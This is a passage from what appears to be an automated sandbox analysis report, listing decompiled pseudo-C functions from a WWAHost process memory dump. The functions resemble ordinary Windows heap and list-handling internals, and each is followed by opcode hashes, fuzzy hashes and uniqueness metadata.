                                              							_t27 = E039D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                              						}
                                              						goto L5;
                                              					} else {
                                              						L5:
                                              						return _t27;
                                              					}
                                              				}
                                              			}














                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                              • Instruction ID: d446e350d8c3195f9e8993124a5b1fff190917fbfb16485e609ea2c7ebd58173
                                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                              • Instruction Fuzzy Hash: 1021C232A216809FDB15EB69CA44B3977ECAF44280F0D08E5ED448B7D2E774DC40C6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E0398FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				intOrPtr _v8;
                                              				void* _t19;
                                              				intOrPtr _t29;
                                              				intOrPtr _t32;
                                              				intOrPtr _t35;
                                              				intOrPtr _t37;
                                              				intOrPtr* _t40;
                                              
                                              				_t35 = __edx;
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t37 = 0;
                                              				_v8 = __edx;
                                              				_t29 = __ecx;
                                              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                              					L3:
                                              					_t19 = _a4 - 4;
                                              					if(_t19 != 0) {
                                              						if(_t19 != 1) {
                                              							L7:
                                              							return _t37;
                                              						}
                                              						if(_t35 == 0) {
                                              							L11:
                                              							_t37 = 0xc000000d;
                                              							goto L7;
                                              						}
                                              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                              							_t35 = _v8;
                                              						}
                                              						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                              						goto L7;
                                              					}
                                              					if(_t29 == 0) {
                                              						goto L11;
                                              					}
                                              					_t32 =  *_t40;
                                              					if(_t32 != 0) {
                                              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                              						E039676E2( *_t40);
                                              					}
                                              					 *_t40 = _t29;
                                              					goto L7;
                                              				}
                                              				_t40 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                              				if(_t40 == 0) {
                                              					_t37 = 0xc0000017;
                                              					goto L7;
                                              				}
                                              				_t35 = _v8;
                                              				 *_t40 = 0;
                                              				 *((intOrPtr*)(_t40 + 4)) = 0;
                                              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                              				goto L3;
                                              			}











                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                              • Instruction ID: 01b3a6e1637f94f7459e4447bc55a6a80804d25dbc0dff8fa924a1ebafcef680
                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                              • Instruction Fuzzy Hash: BC217C72600640DBCB31EF49E540A66F7E9EBD4B50F2985AEE94A8B611D730AC01CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E0398B390(void* __ecx, intOrPtr _a4) {
                                              				signed int _v8;
                                              				signed char _t12;
                                              				signed int _t16;
                                              				signed int _t21;
                                              				void* _t28;
                                              				signed int _t30;
                                              				signed int _t36;
                                              				signed int _t41;
                                              
                                              				_push(__ecx);
                                              				_t41 = _a4 + 0xffffffb8;
                                              				E03972280(_t12, 0x3a48608);
                                              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                              				asm("sbb edi, edi");
                                              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                              				_v8 = _t36;
                                              				asm("lock cmpxchg [ebx], ecx");
                                              				_t30 = 1;
                                              				if(1 != 1) {
                                              					while(1) {
                                              						_t21 = _t30 & 0x00000006;
                                              						_t16 = _t30;
                                              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                              						asm("lock cmpxchg [edi], esi");
                                              						if(_t16 == _t30) {
                                              							break;
                                              						}
                                              						_t30 = _t16;
                                              					}
                                              					_t36 = _v8;
                                              					if(_t21 == 2) {
                                              						_t16 = E039900C2(0x3a48608, 0, _t28);
                                              					}
                                              				}
                                              				if(_t36 != 0) {
                                              					_t16 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                              				}
                                              				return _t16;
                                              			}












                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1e30bfd382d2decfb25499fbc5242def2727dee26a7d5f036cecd44cf00cd98
                                              • Instruction ID: fe73fb4cac61e6028cc89609eeb871bbe76324fb10071d4c07715239ebb9ae43
                                              • Opcode Fuzzy Hash: f1e30bfd382d2decfb25499fbc5242def2727dee26a7d5f036cecd44cf00cd98
                                              • Instruction Fuzzy Hash: 7F116F373111145BCB18DB549D4166BB25EEBC5370B2D012EDD16CB380CA369C02C695
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E03959240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                              				intOrPtr _t33;
                                              				intOrPtr _t37;
                                              				intOrPtr _t41;
                                              				intOrPtr* _t46;
                                              				void* _t48;
                                              				intOrPtr _t50;
                                              				intOrPtr* _t60;
                                              				void* _t61;
                                              				intOrPtr _t62;
                                              				intOrPtr _t65;
                                              				void* _t66;
                                              				void* _t68;
                                              
                                              				_push(0xc);
                                              				_push(0x3a2f708);
                                              				E039AD08C(__ebx, __edi, __esi);
                                              				_t65 = __ecx;
                                              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                              				if( *(__ecx + 0x24) != 0) {
                                              					_push( *(__ecx + 0x24));
                                              					E039995D0();
                                              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                              				}
                                              				L6();
                                              				L6();
                                              				_push( *((intOrPtr*)(_t65 + 0x28)));
                                              				E039995D0();
                                              				_t33 =  *0x3a484c4; // 0x0
                                              				L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                              				_t37 =  *0x3a484c4; // 0x0
                                              				L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                              				_t41 =  *0x3a484c4; // 0x0
                                              				E03972280(L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x3a486b4);
                                              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                              				_t46 = _t65 + 0xe8;
                                              				_t62 =  *_t46;
                                              				_t60 =  *((intOrPtr*)(_t46 + 4));
                                              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                              					_t61 = 3;
                                              					asm("int 0x29");
                                              					_push(_t65);
                                              					_t66 = _t61;
                                              					_t23 = _t66 + 0x14; // 0x8df8084c
                                              					_push( *_t23);
                                              					E039995D0();
                                              					_t24 = _t66 + 0x10; // 0x89e04d8b
                                              					_push( *_t24);
                                              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                              					_t48 = E039995D0();
                                              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                              					return _t48;
                                              				} else {
                                              					 *_t60 = _t62;
                                              					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                              					 *(_t68 - 4) = 0xfffffffe;
                                              					E03959325();
                                              					_t50 =  *0x3a484c4; // 0x0
                                              					return E039AD0D1(L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                              				}
                                              			}
















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 85d673551b27180cc8e757db0ca1ea54ada6059bfae752dbc6cfd7f6f4794fe6
                                              • Instruction ID: 168ef9d4d74ec2cef518456adcf394fc58c86782076eeab064ac8a73a798a2d7
                                              • Opcode Fuzzy Hash: 85d673551b27180cc8e757db0ca1ea54ada6059bfae752dbc6cfd7f6f4794fe6
                                              • Instruction Fuzzy Hash: 96216A35051B00DFC721EF68DA00F5AB7F9FF58704F0545A8E0498B6A2CB39E982CB44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E039E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                              				intOrPtr* _t18;
                                              				intOrPtr _t24;
                                              				intOrPtr* _t27;
                                              				intOrPtr* _t30;
                                              				intOrPtr* _t31;
                                              				intOrPtr _t33;
                                              				intOrPtr* _t34;
                                              				intOrPtr* _t35;
                                              				void* _t37;
                                              				void* _t38;
                                              				void* _t39;
                                              				void* _t43;
                                              
                                              				_t39 = __eflags;
                                              				_t35 = __edi;
                                              				_push(8);
                                              				_push(0x3a308d0);
                                              				E039AD08C(__ebx, __edi, __esi);
                                              				_t37 = __ecx;
                                              				E039E41E8(__ebx, __edi, __ecx, _t39);
                                              				E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                              				_t18 = _t37 + 8;
                                              				_t33 =  *_t18;
                                              				_t27 =  *((intOrPtr*)(_t18 + 4));
                                              				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                              					L8:
                                              					_push(3);
                                              					asm("int 0x29");
                                              				} else {
                                              					 *_t27 = _t33;
                                              					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                              					_t35 = 0x3a487e4;
                                              					_t18 =  *0x3a487e0; // 0x0
                                              					while(_t18 != 0) {
                                              						_t43 = _t18 -  *0x3a45cd0; // 0xffffffff
                                              						if(_t43 >= 0) {
                                              							_t31 =  *0x3a487e4; // 0x0
                                              							_t18 =  *_t31;
                                              							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                              								goto L8;
                                              							} else {
                                              								 *0x3a487e4 = _t18;
                                              								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                              								L03957055(_t31 + 0xfffffff8);
                                              								_t24 =  *0x3a487e0; // 0x0
                                              								_t18 = _t24 - 1;
                                              								 *0x3a487e0 = _t18;
                                              								continue;
                                              							}
                                              						}
                                              						goto L9;
                                              					}
                                              				}
                                              				L9:
                                              				__eflags =  *0x3a45cd0;
                                              				if( *0x3a45cd0 <= 0) {
                                              					L03957055(_t37);
                                              				} else {
                                              					_t30 = _t37 + 8;
                                              					_t34 =  *0x3a487e8; // 0x0
                                              					__eflags =  *_t34 - _t35;
                                              					if( *_t34 != _t35) {
                                              						goto L8;
                                              					} else {
                                              						 *_t30 = _t35;
                                              						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                              						 *_t34 = _t30;
                                              						 *0x3a487e8 = _t30;
                                              						 *0x3a487e0 = _t18 + 1;
                                              					}
                                              				}
                                              				 *(_t38 - 4) = 0xfffffffe;
                                              				return E039AD0D1(L039E4320());
                                              			}
















                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89e4a496881a91e0782b5899a3c878f41103c06825a276e6b4e1f7722ff48e8f
                                              • Instruction ID: 3cbea29b2382370e69bfec4c3d82a391c80f0f61a18ca21856862545c4019fec
                                              • Opcode Fuzzy Hash: 89e4a496881a91e0782b5899a3c878f41103c06825a276e6b4e1f7722ff48e8f
                                              • Instruction Fuzzy Hash: 3A219D78902700CFCB56EF6AE610628B7F8FBC6354B5482AEC1058F754D73AC482CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 22%
                                              			E03982397(intOrPtr _a4) {
                                              				void* __ebx;
                                              				void* __ecx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t11;
                                              				void* _t19;
                                              				void* _t25;
                                              				void* _t26;
                                              				intOrPtr _t27;
                                              				void* _t28;
                                              				void* _t29;
                                              
                                              				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                              				if( *0x3a4848c != 0) {
                                              					L0397FAD0(0x3a48610);
                                              					if( *0x3a4848c == 0) {
                                              						E0397FA00(0x3a48610, _t19, _t27, 0x3a48610);
                                              						goto L1;
                                              					} else {
                                              						_push(0);
                                              						_push(_a4);
                                              						_t26 = 4;
                                              						_t29 = E03982581(0x3a48610, 0x39350a0, _t26, _t27, _t28);
                                              						E0397FA00(0x3a48610, 0x39350a0, _t27, 0x3a48610);
                                              					}
                                              				} else {
                                              					L1:
                                              					_t11 =  *0x3a48614; // 0x1
                                              					if(_t11 == 0) {
                                              						_t11 = E03994886(0x3931088, 1, 0x3a48614);
                                              					}
                                              					_push(0);
                                              					_push(_a4);
                                              					_t25 = 4;
                                              					_t29 = E03982581(0x3a48610, (_t11 << 4) + 0x3935070, _t25, _t27, _t28);
                                              				}
                                              				if(_t29 != 0) {
                                              					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                              					 *((char*)(_t29 + 0x40)) = 0;
                                              				}
                                              				return _t29;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74390105a7f8f94780ae85cc9fe6c85b0208ca0b6a0b79fc79b4f4428028b17
                                              • Instruction ID: 8fd28ae523f9d1d46522cadda2e92c8086b286918e0ff9d47e454faa5c037dbc
                                              • Opcode Fuzzy Hash: c74390105a7f8f94780ae85cc9fe6c85b0208ca0b6a0b79fc79b4f4428028b17
                                              • Instruction Fuzzy Hash: FC112B7664034467E724FB2AAC90B15F2CCEBD0B50F184827F546AB290D7B9E8018754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E039D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                              				signed short* _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				signed int _t22;
                                              				signed char _t23;
                                              				short _t32;
                                              				void* _t38;
                                              				char* _t40;
                                              
                                              				_v12 = __edx;
                                              				_t29 = 0;
                                              				_v8 = __ecx;
                                              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                              				_t38 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                              				if(_t38 != 0) {
                                              					_t40 = _a4;
                                              					 *_t40 = 1;
                                              					E0399F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                              					_t22 = _v12 >> 1;
                                              					_t32 = 0x2e;
                                              					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                              					_t23 = E0398D268(_t38, 1);
                                              					asm("sbb al, al");
                                              					 *_t40 =  ~_t23 + 1;
                                              					L039777F0(_v16, 0, _t38);
                                              				} else {
                                              					 *_a4 = 0;
                                              					_t29 = 0xc0000017;
                                              				}
                                              				return _t29;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                              • Instruction ID: e3528161067cff917f3c7ce41751e40b046ed84defec9541f397c090518da8e6
                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                              • Instruction Fuzzy Hash: 2F110276504208BBCB01EF5D98808BEB7B9EFD5300F1080AAF944CB350DA318D51C3A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 42%
                                              			E0395C962(char __ecx) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* _t19;
                                              				char _t22;
                                              				void* _t26;
                                              				void* _t27;
                                              				char _t32;
                                              				char _t34;
                                              				void* _t35;
                                              				void* _t37;
                                              				intOrPtr* _t38;
                                              				signed int _t39;
                                              
                                              				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                              				_v8 =  *0x3a4d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                              				_t34 = __ecx;
                                              				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                              					_t26 = 0;
                                              					E0396EEF0(0x3a470a0);
                                              					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                              					if(E039DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                              						L9:
                                              						E0396EB70(_t29, 0x3a470a0);
                                              						_t19 = _t26;
                                              						L2:
                                              						_pop(_t35);
                                              						_pop(_t37);
                                              						_pop(_t27);
                                              						return E0399B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                              					}
                                              					_t29 = _t34;
                                              					_t26 = E039DF1FC(_t34, _t32);
                                              					if(_t26 < 0) {
                                              						goto L9;
                                              					}
                                              					_t38 =  *0x3a470c0; // 0x0
                                              					while(_t38 != 0x3a470c0) {
                                              						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                              						_t38 =  *_t38;
                                              						_v12 = _t22;
                                              						if(_t22 != 0) {
                                              							_t29 = _t22;
                                              							 *0x3a4b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                              							_v12();
                                              						}
                                              					}
                                              					goto L9;
                                              				}
                                              				_t19 = 0;
                                              				goto L2;
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01b52d473732615416f21177bc0248bc2961134fa8f4b5a0c7026568a366213b
                                              • Instruction ID: d09581e01acdc3122bc81ee8b8442691c7a66b2fef576720a31d2081f127bbe7
                                              • Opcode Fuzzy Hash: 01b52d473732615416f21177bc0248bc2961134fa8f4b5a0c7026568a366213b
                                              • Instruction Fuzzy Hash: F411CE367107869FCB10EF69D885A2BB7A9FBC8650B04092DE85287651EB31EC10CBD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E039937F5(void* __ecx, intOrPtr* __edx) {
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed char _t6;
                                              				intOrPtr _t13;
                                              				intOrPtr* _t20;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              				intOrPtr* _t29;
                                              
                                              				_t27 = __edx;
                                              				_t28 = __ecx;
                                              				if(__edx == 0) {
                                              					E03972280(_t6, 0x3a48550);
                                              				}
                                              				_t29 = E0399387E(_t28);
                                              				if(_t29 == 0) {
                                              					L6:
                                              					if(_t27 == 0) {
                                              						E0396FFB0(0x3a48550, _t27, 0x3a48550);
                                              					}
                                              					if(_t29 == 0) {
                                              						return 0xc0000225;
                                              					} else {
                                              						if(_t27 != 0) {
                                              							goto L14;
                                              						}
                                              						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                              						goto L11;
                                              					}
                                              				} else {
                                              					_t13 =  *_t29;
                                              					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                              						L13:
                                              						_push(3);
                                              						asm("int 0x29");
                                              						L14:
                                              						 *_t27 = _t29;
                                              						L11:
                                              						return 0;
                                              					}
                                              					_t20 =  *((intOrPtr*)(_t29 + 4));
                                              					if( *_t20 != _t29) {
                                              						goto L13;
                                              					}
                                              					 *_t20 = _t13;
                                              					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                              					asm("btr eax, ecx");
                                              					goto L6;
                                              				}
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 111cc70a6c47e7dbf7f542c99b52b3d6e11fd7738b382a904e16863f10b11fa8
                                              • Instruction ID: aa7ebfe14315d191fd0984d845a9c9065e0b0d106a2f62e87f20a6fc2b17f87e
                                              • Opcode Fuzzy Hash: 111cc70a6c47e7dbf7f542c99b52b3d6e11fd7738b382a904e16863f10b11fa8
                                              • Instruction Fuzzy Hash: FF01C4BA9016109BDB27DF1F9980A26BBAEDFC5B9071984EBE8468B614D730C801C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0398002D() {
                                              				void* _t11;
                                              				char* _t14;
                                              				signed char* _t16;
                                              				char* _t27;
                                              				signed char* _t29;
                                              
                                              				_t11 = E03977D50();
                                              				_t27 = 0x7ffe0384;
                                              				if(_t11 != 0) {
                                              					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              				} else {
                                              					_t14 = 0x7ffe0384;
                                              				}
                                              				_t29 = 0x7ffe0385;
                                              				if( *_t14 != 0) {
                                              					if(E03977D50() == 0) {
                                              						_t16 = 0x7ffe0385;
                                              					} else {
                                              						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              					}
                                              					if(( *_t16 & 0x00000040) != 0) {
                                              						goto L18;
                                              					} else {
                                              						goto L3;
                                              					}
                                              				} else {
                                              					L3:
                                              					if(E03977D50() != 0) {
                                              						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              					}
                                              					if( *_t27 != 0) {
                                              						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                              							goto L5;
                                              						}
                                              						if(E03977D50() != 0) {
                                              							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              						}
                                              						if(( *_t29 & 0x00000020) == 0) {
                                              							goto L5;
                                              						}
                                              						L18:
                                              						return 1;
                                              					} else {
                                              						L5:
                                              						return 0;
                                              					}
                                              				}
                                              			}

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                              • Instruction ID: 5b60dec065ee36bf4d5641720327669b976cedccdc6a6a8940365fc75266d938
                                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                              • Instruction Fuzzy Hash: 2711ED327127C29FD723EB6AC964B3977DCAB80794F0D00E4DD148B7A2E728D841C262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E0396766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                              				char _v8;
                                              				void* _t22;
                                              				void* _t24;
                                              				intOrPtr _t29;
                                              				intOrPtr* _t30;
                                              				void* _t42;
                                              				intOrPtr _t47;
                                              
                                              				_push(__ecx);
                                              				_t36 =  &_v8;
                                              				if(E0398F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                              					L10:
                                              					_t22 = 0;
                                              				} else {
                                              					_t24 = _v8 + __ecx;
                                              					_t42 = _t24;
                                              					if(_t24 < __ecx) {
                                              						goto L10;
                                              					} else {
                                              						if(E0398F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                              							goto L10;
                                              						} else {
                                              							_t29 = _v8 + _t42;
                                              							if(_t29 < _t42) {
                                              								goto L10;
                                              							} else {
                                              								_t47 = _t29;
                                              								_t30 = _a16;
                                              								if(_t30 != 0) {
                                              									 *_t30 = _t47;
                                              								}
                                              								if(_t47 == 0) {
                                              									goto L10;
                                              								} else {
                                              									_t22 = L03974620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return _t22;
                                              			}











                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                              • Instruction ID: 7fbf2103a46577f8761787f70b2e64ebbcef07cb3cc422efdf9b95e4fcc97f70
